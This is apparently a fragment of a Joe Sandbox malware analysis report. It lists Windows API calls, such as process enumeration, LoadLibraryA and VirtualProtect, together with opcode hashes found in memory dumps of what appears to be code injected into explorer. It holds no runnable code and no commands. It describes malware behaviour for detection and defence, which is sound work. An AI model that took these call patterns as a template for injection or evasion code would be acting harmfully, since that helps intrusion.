                                                                                                                                                      • Source File: 0000001B.00000002.2523374626.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_9d1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: SectionUnmapView
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 498011366-0
                                                                                                                                                      • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                                                      • Instruction ID: 48e717ff2dba5a23c965fff49e0793bde15dbb3522983da262fd758735ccf20d
                                                                                                                                                      • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                                                      • Instruction Fuzzy Hash: 0B11B274651D095BFB58FBB8989D37533E5FB58312F54C02BE815C73A2EE398A818701

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 009D1BF8: OpenFileMappingA.KERNEL32 ref: 009D1C0F
                                                                                                                                                        • Part of subcall function 009D1BF8: MapViewOfFile.KERNELBASE ref: 009D1C2E
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 009D35B7
                                                                                                                                                      • Process32First.KERNEL32 ref: 009D35DA
                                                                                                                                                      • CharLowerA.USER32 ref: 009D35EE
                                                                                                                                                      • Process32Next.KERNEL32 ref: 009D36CD
                                                                                                                                                      • CloseHandle.KERNELBASE ref: 009D36DE
                                                                                                                                                      • SysFreeMap.PGOCR ref: 009D36F7
                                                                                                                                                      • SleepEx.KERNELBASE ref: 009D3701
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.2523374626.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_9d1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileProcess32$CharCloseCreateFirstFreeHandleLowerMappingNextOpenSleepSnapshotToolhelp32View
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2386764625-0
                                                                                                                                                      • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                                                      • Instruction ID: a6b2ef14d9145296b1d160cd7cfe8a06c8c5cee9ba8ba4aea62e4ad73cc34212
                                                                                                                                                      • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                                                      • Instruction Fuzzy Hash: C751C831358A085FDB19FF68D8997AA73D5EB94301F44C61AE44BC33A1DF38DA058782

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 009DB5A7
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 009DB651
                                                                                                                                                      • VirtualProtect.KERNELBASE ref: 009DB66F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.2523374626.00000000009DA000.00000040.80000000.00040000.00000000.sdmp, Offset: 009DA000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_9da000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 895956442-0
                                                                                                                                                      • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                                                      • Instruction ID: 64797c5a4151a12b08f73e8cc32d38b3d47860e6e246d71445333e384de12c06
                                                                                                                                                      • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                                                      • Instruction Fuzzy Hash: FD517B327D491E8BCB24AB38ACC43F4B7C1F759325B594A2BE49AC3395D758C8468381

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.2523374626.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_9d1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$MappingOpenView
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3439327939-0
                                                                                                                                                      • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                                                      • Instruction ID: 7c6f8af0dc3895e2eca63536ef45dac92d7060d84882ed0a7e309321eecd9a8b
                                                                                                                                                      • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                                                      • Instruction Fuzzy Hash: F8F01234318F4D4FAB45EF7C9C9C135B7E1EBA8202744857A985AC6265EF34C8458711